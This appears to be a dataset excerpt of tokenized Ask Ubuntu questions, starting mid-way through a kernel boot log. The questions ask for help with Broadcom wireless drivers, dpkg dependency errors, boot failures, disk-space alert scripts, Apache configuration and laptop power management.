13:12:48 kamil-desktop kernel : [ 0.006518 ] initializing cgroup subsys blkio dec 13 13:12:48 kamil-desktop kernel : [ 0.006521 ] initializing cgroup subsys perf_event dec 13 13:12:48 kamil-desktop kernel : [ 0.006524 ] initializing cgroup subsys hugetlb dec 13 13:12:48 kamil-desktop kernel : [ 0.006559 ] cpu : physical processor id : 0 dec 13 13:12:48 kamil-desktop kernel : [ 0.006561 ] cpu : processor core id : 0 dec 13 13:12:48 kamil-desktop kernel : [ 0.006563 ] mce : cpu supports 6 mce banks dec 13 13:12:48 kamil-desktop kernel : [ 0.006573 ] cpu0 : thermal monitoring enabled ( tm2 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.006578 ] process : using mwait in idle threads dec 13 13:12:48 kamil-desktop kernel : [ 0.006584 ] last level itlb entries : 4kb 128 , 2mb 4 , 4mb 4 dec 13 13:12:48 kamil-desktop kernel : [ 0.006584 ] last level dtlb entries : 4kb 256 , 2mb 0 , 4mb 32 dec 13 13:12:48 kamil-desktop kernel : [ 0.006584 ] tlb_flushall_shift : -1 dec 13 13:12:48 kamil-desktop kernel : [ 0.006711 ] freeing smp alternatives : 24k freed dec 13 13:12:48 kamil-desktop kernel : [ 0.009991 ] acpi : core revision 20121018 dec 13 13:12:48 kamil-desktop kernel : [ 0.013634 ] ftrace : allocating 29364 entries in 115 pages dec 13 13:12:48 kamil-desktop kernel : [ 0.024503 ] ..timer : vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 dec 13 13:12:48 kamil-desktop kernel : [ 0.065610 ] smpboot : cpu0 : intel ( r ) core ( tm ) 2 duo cpu e4500 @ 2.20ghz ( fam : 06 , model : 0f , stepping : 0d ) dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] performance events : pebs fmt0+ , 4-deep lbr , core2 events , intel pmu driver . dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] perf_event_intel : pebs disabled due to cpu errata dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] ... version : 2 dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] ... bit width : 40 dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] ... generic registers : 2 dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] ... value mask : 000000ffffffffff dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] ... max period : 000000007fffffff dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] ... fixed-purpose events : 3 dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] ... event mask : 0000000700000003 dec 13 13:12:48 kamil-desktop kernel : [ 0.068000 ] smpboot : booting node 0 , processors # 1 dec 13 13:12:48 kamil-desktop kernel : [ 0.078404 ] brought up 2 cpus dec 13 13:12:48 kamil-desktop kernel : [ 0.078411 ] smpboot : total of 2 processors activated ( 8778.71 bogomips ) dec 13 13:12:48 kamil-desktop kernel : [ 0.078532 ] nmi watchdog : enabled on all cpus , permanently consumes one hw-pmu counter . dec 13 13:12:48 kamil-desktop kernel : [ 0.080006 ] devtmpfs : initialized dec 13 13:12:48 kamil-desktop kernel : [ 0.081553 ] evm : security.selinux dec 13 13:12:48 kamil-desktop kernel : [ 0.081555 ] evm : security.smack64 dec 13 13:12:48 kamil-desktop kernel : [ 0.081557 ] evm : security.capability dec 13 13:12:48 kamil-desktop kernel : [ 0.081571 ] pm : registering acpi nvs region [ mem 0x7e5f5000-0x7e6d0fff ] ( 901120 bytes ) dec 13 13:12:48 kamil-desktop kernel : [ 0.081571 ] pm : registering acpi nvs region [ mem 0x7f6a8000-0x7f6e9fff ] ( 270336 bytes ) dec 13 13:12:48 kamil-desktop kernel : [ 0.081571 ] regulator-dummy : no parameters dec 13 13:12:48 kamil-desktop kernel : [ 0.081571 ] net : registered protocol family 16 dec 13 13:12:48 kamil-desktop kernel : [ 0.081571 ] acpi : bus type pci registered dec 13 13:12:48 kamil-desktop kernel : [ 0.081571 ] pci : mmconfig for domain 0000 [ bus 00-7f ] at [ mem 0xf0000000-0xf7ffffff ] ( base 0xf0000000 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.081571 ] pci : not using mmconfig dec 13 13:12:48 kamil-desktop kernel : [ 0.081571 ] pci : using configuration type 1 for base access dec 13 13:12:48 kamil-desktop kernel : [ 0.084085 ] bio : create slab at 0 dec 13 13:12:48 kamil-desktop kernel : [ 0.084085 ] acpi : added _osi ( module device ) dec 13 13:12:48 kamil-desktop kernel : [ 0.084085 ] acpi : added _osi ( processor device ) dec 13 13:12:48 kamil-desktop kernel : [ 0.084085 ] acpi : added _osi ( 3.0 _scp extensions ) dec 13 13:12:48 kamil-desktop kernel : [ 0.084085 ] acpi : added _osi ( processor aggregator device ) dec 13 13:12:48 kamil-desktop kernel : [ 0.084784 ] acpi : ec : look up ec in dsdt dec 13 13:12:48 kamil-desktop kernel : [ 0.086442 ] acpi : interpreter enabled dec 13 13:12:48 kamil-desktop kernel : [ 0.086447 ] acpi : ( supports s0 s1 s3 s4 s5 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.086465 ] acpi : using ioapic for interrupt routing dec 13 13:12:48 kamil-desktop kernel : [ 0.086479 ] pci : mmconfig for domain 0000 [ bus 00-7f ] at [ mem 0xf0000000-0xf7ffffff ] ( base 0xf0000000 ) dec 13 13:12:48 kamil-desktop kernel : [ 0.086799 ] pci : mmconfig at [ mem 0xf0000000-0xf7ffffff ] reserved in acpi motherboard resources dec 13 13:12:48 kamil-desktop kernel : [ 0.086803 ] pci : mmconfig for 0000 [ bus00-3f ] at [ mem 0xf0000000-0xf3ffffff ] ( base 0xf0000000 ) ( size reduced ! ) dec 13 13:12:48 kamil-desktop kernel : [ 0.098542 ] acpi : no dock devices found . dec 13 13:12:48 kamil-desktop kernel : [ 0.098547 ] pci : using host bridge windows from acpi ; if necessary , use `` pci=nocrs '' and
389593	laptop wireless card help ? bcm4311	okay i have an acer aspire 5517 , it have bcm 4311 802 wireless card , ubuntu 12.04.3 lts network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) here is the output of sudo lshw *-network description : ethernet interface product : ar8132 fast ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : c0 serial : 00:26:22:15:75:4d size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.1-napi duplex=full ip=192.168.1.101 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:43 memory : d1000000-d103ffff ioport:2000 ( size=128 ) i tried this how to install broadcom wireless drivers ( bcm43xx ) did n't work . for chili55 i did this laptop @ laptop-aspire-5517 : ~ $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] rs780 host bridge 00:01.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) 00:05.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 1 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0 usb ohci1 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 3c ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 ide controller 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs780m [ mobility radeon hd 3200 ] 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 08:00.0 ethernet controller : qualcomm atheros ar8132 fast ethernet ( rev c0 ) $ sudo apt-get remove -- purge bcmwl-kernel-source e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
389594	knowing the error during system loads	sometimes when the system loads it shows an error in a rush and we are not able to even notice or read it to the full . is there any way in terminal or log file to see such an error ? for example mounting errors , hardware errors etc .
389596	boot problem after purging whoopsie in ubuntu gnome 13.04	i tried this do disable/remove crash report daemon then stuck at blue screen . i tried to enter the recovery mode , , no use.then i used live mode , , i tried to repair the file system sudo e2fsck /dev/sda1 sudo e2fsck -v-i-f /dev/sda1 i tried boot-repair , , the output is before this issue i survived with sudo e2fsck -v-i-f /dev/sda1 not this time , ,
389598	how do i set up usb scanning with my brother mfc-6800 ?	i have a brother mfc-6800 and was able to set up the printer drivers all set up via synaptic . how do i get scanning working ?
389600	quota error ( device dm-4 ) : find_block_dqentry : quota for id 107 referenced but not present	i have problem with my server . for server configuration i followed http : //www.howtoforge.com/perfect-server-ubuntu-12.04-lts-apache2-bind-dovecot-ispconfig-3-p5 my screen is flashing every 20 seconds with [ 545.828437 ] quota error ( device dm-4 ) : find_block_dqentry : quota for id 107 referenced but not present [ 545.829017 ] quota error ( device dm-4 ) : qtree_read_dquot : ca n't read quota structure for id 107 ( i also did photos because cant find thease errors in logs ) . my fstab : proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/prasytojas -- vg-root / ext4 errors=remount-ro , usrjquota=quota.user , grpjquota=quota.group , jqfmt=vfsv0 0 1 /dev/mapper/isw_bjaiaiijih_raidas1 /boot ext2 defaults 0 2 /dev/mapper/prasytojas -- vg-swap_1 none swap sw 0 0 /var/log/ispconfig/httpd/aus.lt /var/www/clients/client1/web1/log none bind , nobootwait 0 0 /var/log/ispconfig/httpd/pra.lt /var/www/clients/client1/web3/log none bind , nobootwait 0 0 /var/log/ispconfig/httpd/ve.lt /var/www/clients/client1/web4/log none bind , nobootwait 0 0 /var/log/ispconfig/httpd/1d.lt /var/www/clients/client1/web5/log none bind , nobootwait 0 0 how can i fix this ?
389601	`` package is in a very bad inconsistent state '' , how to fix ?	i 've tried to make a clean install of ubuntu 13.10 from ubuntu 12.04 lts . anyway , whenever i installed a program , the code come out noticed me about `` dpkg : error processing libkfbapi1 ( -- configure ) : '' . i assume that the problem came from this moment when i was installing some programs from software center then suddenly my computer turned off . after that i faced this problem that mentioned above . sudo apt-get install subdownloaderreading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : subdownloader 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 35 not fully installed or removed . need to get 0 b/720 kb of archives . after this operation , 2,323 kb of additional disk space will be used . selecting previously unselected package subdownloader . ( reading database ... 222023 files and directories currently installed . ) unpacking subdownloader ( from ... /subdownloader_2.0.14-1.1_all.deb ) ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ... processing triggers for man-db ... dpkg : error processing libgif4 : amd64 ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . dpkg : dependency problems prevent configuration of openjdk-7-jre : amd64 : openjdk-7-jre : amd64 depends on libgif4 ( > = 4.1.4 ) ; however : package libgif4 : amd64 is not configured yet . dpkg : error processing openjdk-7-jre : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of defa ult-jre : defa ult-jre depends on openjdk-7-jre ( > = 7~u3-2.1.1 ) ; however : package openjdk-7-jre : amd64 is not configured yet . dpkg : error processing default-jre ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libkhtml5 : libkhtml5 depends on libgif4 ( > = 4.1.4 ) ; however : package libgif4 : amd64 is not configured yet . dpkg : error processing libkhtml5 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kdelibs5-plugins : kdelibs5-plugins depends on libkhtml5 ( = 4:4.11.2-0ubuntu2.1 ) ; however : package libkhtml5 is not configured yet . dpkg : error processing kdelibs5-plugins ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kde-runtime : kde-runtime depends on libkhtml5 ( > = 4:4.3.4 ) ; however : package libkhtml5 is not configured yet . kde-runtime depends on kdelibs5-plugins ( > = 4:4.11.2 ) ; however : package kdelibs5-plugins is not configured yet . dpkg : error processing kde-runtime ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kdepim-runtime : kdepim-runtime depends on kde-runtime ; however : package kde-runtime is not configured yet . dpkg : error processing kdepim-runtime ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libkgapi2-2 : amd64 : libkgapi2-2 : amd64 depends on kdepim-runtime ; however : package kdepim-runtime is not configured yet . dpkg : error processing libkgapi2-2 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mplayer : mplayer depends on libgif4 ( > = 4.1.4 ) ; however : package libgif4 : amd64 is not configured yet . dpkg : error processing mplayer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of smplayer : smplayer depends on mplayer | mplayer-nogui | mplayer-mt | mplayer2 ; however : package mplayer is not configured yet . package mplayer-nogui is not installed . package mplayer-mt is not installed . package mplayer2 is not installed . dpkg : error processing smplayer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgdiplus : libgdiplus depends on libgif4 ( > = 4.1.4 ) ; however : package libgif4 : amd64 is not configured yet . dpkg : error processing libgdiplus ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libmono-system-drawing4.0-cil : libmono-system-drawing4.0-cil depends on libgdiplus ( > = 2.6.7 ) ; however : package libgdiplus is not configured yet . dpkg : error processing libmono-system-drawing4.0-cil ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgtk2.0-cil : libgtk2.0-cil depends on libmono-system-drawing4.0-cil ( > = 1.0 ) ; however : package libmono-system-drawing4.0-cil is not configured yet . dpkg : error processing libgtk2.0-cil ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libgtk-sharp-beans-cil : libgtk-sharp-beans-cil depends on libgtk2.0-cil ( > = 2.12.10-1ubuntu1 ) ; however : package libgtk2.0-cil is not configured yet . dpkg : error processing libgtk-sharp-beans-cil ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of libnotify0.4-cil : libnotify0.4-cil depends on libgtk2.0-cil ( > = 2.12.10-1ubuntu1 ) ; however : package libgtk2.0-cil is not configured yet . dpkg : error processing libnotify0.4-cil ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of banshee : banshee depends on libgtk-sharp-beans-cil ; however : package libgtk-sharp-beans-cil is not configured yet . banshee depends on libgtk2.0-cil ( > = 2.12.10-1ubuntu1 ) ; however : package libgtk2.0-cil is not configured yet . banshee depends on libnotify0.4-cil ( > = 0.4.0~r2998 ) ; however : package libnotify0.4-cil is not configured yet . dpkg : error processing banshee ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of banshee-extensions-common : banshee-extensions-common depends on banshee ( > = 2.6.1 ) ; however : package banshee is not configured yet . dpkg : error processing banshee-extensions-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of banshee-extension-albumartwriter : banshee-extension-albumartwriter depends on banshee-extensions-common ( = 2.4.0-2ubuntu1 ) ; however : package banshee-extensions-common is not configured yet . banshee-extension-albumartwriter depends on libgtk2.0-cil ( > = 2.12.10-1ubuntu1 ) ; however : package libgtk2.0-cil is not configured yet . banshee-extension-albumartwriter depends on libmono-system-drawing4.0-cil ( > = 1.0 ) ; however : package libmono-system-drawing4.0-cil is not configured yet . dpkg : error processing banshee-extension-albumartwriter ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of banshee-extension-coverwallpaper : banshee-extension-coverwallpaper depends on banshee-extensions-common ( = 2.4.0-2ubuntu1 ) ; however : package banshee-extensions-common is not configured yet . banshee-extension-coverwallpaper depends on libgtk2.0-cil ( > = 2.12.10-1ubuntu1 ) ; however : package libgtk2.0-cil is not configured yet . dpkg : error processing banshee-extension-coverwallpaper ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of banshee-extension-lyrics : banshee-extension-lyrics depends on banshee-extensions-common ( = 2.4.0-2ubuntu1 ) ; however : package banshee-extensions-common is not configured yet . banshee-extension-lyrics depends on libgtk2.0-cil ( > = 2.12.10-1ubuntu1 ) ; however : package libgtk2.0-cil is not configured yet . dpkg : error processing banshee-extension-lyrics ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of banshee-extension-soundmenu : banshee-extension-soundmenu depends on banshee ( > = 2.6.1 ) ; however : package banshee is not configured yet . banshee-extension-soundmenu depends on libgtk2.0-cil ( > = 2.12.10-1ubuntu1 ) ; however : package libgtk2.0-cil is not configured yet . banshee-extension-soundmenu depends on libnotify0.4-cil ( > = 0.4.0~r2998 ) ; however : package libnotify0.4-cil is not configured yet . dpkg : error processing banshee-extension-soundmenu ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of simplyhtml : simplyhtml depends on openjdk-6-jre | openjdk-7-jre | java2-runtime ; however : package openjdk-6-jre is not installed . package openjdk-7-jre : amd64 is not configured yet . package java2-runtime is not installed . package default-jre which provides java2-runtime is not configured yet . package openjdk-7-jre : amd64 which provides java2-runtime is not configured yet . dpkg : error processing simplyhtml ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of freemind : freemind depends on default-jre | sun-java6-jre ; however : package default-jre is not configured yet . package sun-java6-jre is not installed . freemind depends on simplyhtml ( > > 0.13 ) ; however : package simplyhtml is not configured yet . dpkg : error processing freemind ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of javahelp2 : javahelp2 depends on default-jre | java2-runtime ; however : package default-jre is not configured yet . package java2-runtime is not installed . package default-jre which provides java2-runtime is not configured yet . package openjdk-7-jre : amd64 which provides java2-runtime is not configured yet . dpkg : error processing javahelp2 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of python-kde4 : python-kde4 depends on kde-runtime ; however : package kde-runtime is not configured yet . python-kde4 depends on kdepim-runtime ; however : package kdepim-runtime is not configured yet . python-kde4 depends on libkhtml5 ( > = 4:4.11.1 ) ; however : package libkhtml5 is not configured yet . dpkg : error processing python-kde4 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kde-config-touchpad : kde-config-touchpad depends on python-kde4 ( > = 4:4.5 ) ; however : package python-kde4 is not configured yet . dpkg : error processing kde-config-touchpad ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of qapt-batch : qapt-batch depends on kde-runtime ; however : package kde-runtime is not configured yet . dpkg : error processing qapt-batch ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kubuntu-debug-installer : kubuntu-debug-installer depends on kde-runtime ; however : package kde-runtime is not configured yet . kubuntu-debug-installer depends on qapt-batch ; however : package qapt-batch is not configured yet . dpkg : error processing kubuntu-debug-installer ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of smplayer-themes : smplayer-themes depends on smplayer ; however : package smplayer is not configured yet . dpkg : error processing smplayer-themes ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of smplayer-skins : smplayer-skins depends on smplayer ; however : package smplayer is not configured yet . dpkg : error processing smplayer-skins ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of smtube : smtube depends on smplayer ( > = 0.7.0 ) | mplayer | vlc | dragonplayer | totem | gnome-mplayer ; however : package smplayer is not configured yet . package mplayer is not configured yet . package vlc is not installed . package dragonplayer is not installed . package totem is not installed . package gnome-mplayer is not installed . dpkg : error processing smtube ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up subdownloader ( 2.0.14-1.1 ) ... dpkg : dependency problems prevent configuration of libatk-wrapper-java : libatk-wrapper-java depends on default-jre | java2-runtime ; however : package default-jre is not configured yet . package java2-runtime is not installed . package default-jre which provides java2-runtime is not configured yet . package openjdk-7-jre : amd64 which provides java2-runtime is not configured yet . dpkg : error processing libatk-wrapper-java ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libatk-wrapper-java-jni : amd64 : libatk-wrapper-java-jni : amd64 depends on default-jre | java2-runtime ; however : package default-jre is not configured yet . package java2-runtime is not installed . package default-jre which provides java2-runtime is not configured yet . package openjdk-7-jre : amd64 which provides java2-runtime is not configured yet . libatk-wrapper-java-jni : amd64 depends on libatk-wrapper-java ( > = 0.30.4-0ubuntu4 ) ; however : package libatk-wrappno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already er-java is not configured yet . dpkg : error processing libatk-wrapper-java-jni : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libkolab0 : libkolab0 depends on kdepim-runtime ; however : package kdepim-runtime is not configured yet . dpkg : error processing libkolab0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libkfbapi1 : libkfbapi1 depends on kdepim-runtime ; however : package kdepim-runtime is not configured yet . dpkg : error processing libkfbapi1 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libgif4 : amd64 openjdk-7-jre : amd64 default-jre libkhtml5 kdelibs5-plugins kde-runtime kdepim-runtime libkgapi2-2 : amd64 mplayer smplayer libgdiplus libmono-system-drawing4.0-cil libgtk2.0-cil libgtk-sharp-beans-cil libnotify0.4-cil banshee banshee-extensions-common banshee-extension-albumartwriter banshee-extension-coverwallpaper banshee-extension-lyrics banshee-extension-soundmenu simplyhtml freemind javahelp2 python-kde4 kde-config-touchpad qapt-batch kubuntu-debug-installer smplayer-themes smplayer-skins smtube libatk-wrapper-java libatk-wrapper-java-jni : amd64 libkolab0 libkfbapi1 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
389602	sending email if disk space exceeds	i have a script to calculate available disk space and alert by email if the limit exceeds a given value defined by me . here is the script : df -h | grep -ve '^filesystem|tmpfs|cdrom ' | awk ' { print $ 5 `` `` $ 1 } ' | while read output ; do usep= $ ( echo $ output | awk ' { print $ 1 } ' | cut -d ' % ' -f1 ) partition= $ ( echo $ output | awk ' { print $ 2 } ' ) if [ $ usep -ge $ alert ] ; then messagespace= '' running out of space \ '' $ partition ( $ usep % ) \ '' on $ ( hostname ) as on $ ( date ) '' spacealert fi done now , the problem is if i have two disks whose limit has exceeded the given limit then it will generate two seperate mails . can i make it to send just a single email to me . thanks .
389606	asus laptop power management	i have a couple of symptoms that make me think ubuntu has some problems identifying all the components of my laptop ( asus n56vj-s4051h ) . when starting the computer from the off status , the fan goes to full speed just after the boot manager ( efi ) chose the os . the fan stays on ! the battery symbol in the task bar does n't seem to recognize the battery reliably , esp . when ac power is connected as well . the battery indicator starts blinking once on battery and stays on . the battery is not being charged while the ubuntu is running . i did n't have these problems with windows 8 . i had to switch to a linux system after windows 8 got on my nerves too much ... could you please help me solve these issues or point me to a direction where i can find further information ?
389607	can not login using my administrator account after installing ubuntu 13.10	i 've upgraded from ubuntu 11.10 to ubuntu 13.10 . at the end of installation , a message showed that there are some softwares that ca n't be installed and they must be manually installed later . when the installation finished , i tried to login with my administrator account ( with correct password ) , but i could n't . i had to login with guest account . anyone has the same problem ? what need to do to fix ? thanks a ton !
389609	installing ubuntu on a hp envy 17-j083ca	is it possible to install ubuntu on the laptop i am planning to by . see this website . i would like to install it as a virtual drive / operating system , reading this page . i read about the uefi and how it can cause problem if not completely stop the installation of ubuntu before i buy this laptop i would like to know if i a can install ubuntu .
389611	where to add code for disabling options method in apache	a web application security assessment recommends me to disable options method on the webserver im running apache/2.2.22 ( ubuntu ) the solution i found so far was to add this certain code . rewriteengine on rewritecond % { the_request } ! ^ ( post|get ) \ / . *\ http/1\.1 $ rewriterule . * - [ f ] im quite confused where to add this specific code , i have 3 .conf on my /etc/apache2 apache2.conf httpd.conf ports.conf do i just add the snippet anywhere inside the .conf file ? [ edit ] after adding the config on my apache2.conf or httpd.conf im getting this error when i try to restart invalid command 'rewritecond ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information . ... fail ! [ edit2 ] < ! doctype html public `` -//ietf//dtd html 2.0//en '' > < html > < head > < title > 301 moved permanently < /title > < /head > < body > < h1 > moved permanently < /h1 > < p > the document has moved < a href= '' http : //192.168.5.1/web/ '' > here < /a > . < /p > < hr > < address > apache/2.2.22 ( ubuntu ) server at 192.168.5.1 port 80 < /address > < /body > < /html >
389614	partition the drive in which ubuntu is installed	i got a laptop ( 64-bit ) with ubuntu installed on it.it has 320gb hard disk , but only one drive is there of all 320gb in which ubuntu is installed.i want to partition this single drive on which ubuntu is installed , into 2 partitions so that i can install win8 also . so i want to shrink the drive in which ubuntu is installed without formating it , so that i can create another partition from it
389615	installation problem in vlc media player	how to run media player in ubuntu ? is it require any plug-in or any installer package ? need step by step help , please help me .
389626	plenty of wakeups on idle , dell m4500	i 've been working with ubuntu 12.04 for more than a year and i just ca n't find a solution for my battery shortness anywhere . i have dell m4500 - i7 , 8 g ram ( if you need any more details just say ) . in powertop on idle i have something like ~800 wakeups/second . ( in a good day ) after 5-10 minutes of using ( even idle ) it shutdown . help ? ( i have conky & compiz , but i do n't think that they are the main problem ) edit : answers to questions i saw in different posts : i have jupiter 0.1.9 on windows the battery life time was much better . i changed `` bad '' into `` good '' in powertop , no success there . in power statistics i have more than 2000 processor wakeups\second i have noticed : capacity : 51.2 % energy : 30.9wh energy ( design ) : 62.2wh . powertop : ( it is normal ? ) summary : 829.6 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec power est . usage events/s category description 3.58 w 53.3 % device display backlight 2.05 w 100.0 % device radio device : dell 2.02 w 27.4 ms/s 112.9 process /usr/lib/firefox/f 2.01 w 2.3 ms/s 112.4 interrupt ps/2 touchpad / ke 1.96 w 31.1 ms/s 110.0 process /usr/bin/x :0 -aut 1.64 w 20.5 ms/s 91.8 process nvidia-settings 1.59 w 1.5 ms/s 89.3 timer hrtimer_wakeup 1.15 w 3.5 ms/s 64.2 process /usr/lib/firefox/p 810 mw 10.3 ms/s 45.4 process conky 772 mw 0.8 ms/s 43.3 timer tick_sched_timer 580 mw 10.2 ms/s 32.5 process compiz 452 mw 100.0 % device radio device : dell 381 mw 100.0 % device radio device : iwlw 163 mw 5.4 ms/s 9.1 process sh 157 mw 6.1 ms/s 8.8 interrupt [ 6 ] tasklet ( softir 141 mw 0.8 ms/s 7.9 process dconf worker 137 mw 0.9 ms/s 7.7 process /usr/lib/gnome-set 136 mw 582.8 µs/s 7.6 process /usr/bin/gtk-windo 107 mw 532.3 µs/s 6.0 interrupt [ 9 ] rcu ( softirq ) 90.8 mw 1.2 ms/s 5.1 process prosvc 84.5 mw 1.3 ms/s 4.7 process gdbus 81.0 mw 52.6 pkts/s device network interface : 78.3 mw 2.4 ms/s 4.4 process //bin/dbus-daemon 78.3 mw 132.2 µs/s 4.4 process syndaemon -i 2.0 - 71.2 mw 67.1 µs/s 4.0 kwork ieee80211_iface_wo 53.4 mw 72.6 µs/s 3.0 process [ ksoftirqd/4 ] 52.5 mw 431.2 µs/s 2.9 interrupt [ 7 ] sched ( softirq ) 42.7 mw 668.9 µs/s 2.4 process /usr/lib/zeitgeist 39.2 mw 51.5 µs/s 2.2 process nginx : worker proc 38.3 mw 316.4 µs/s 2.1 process gnome-screensaver
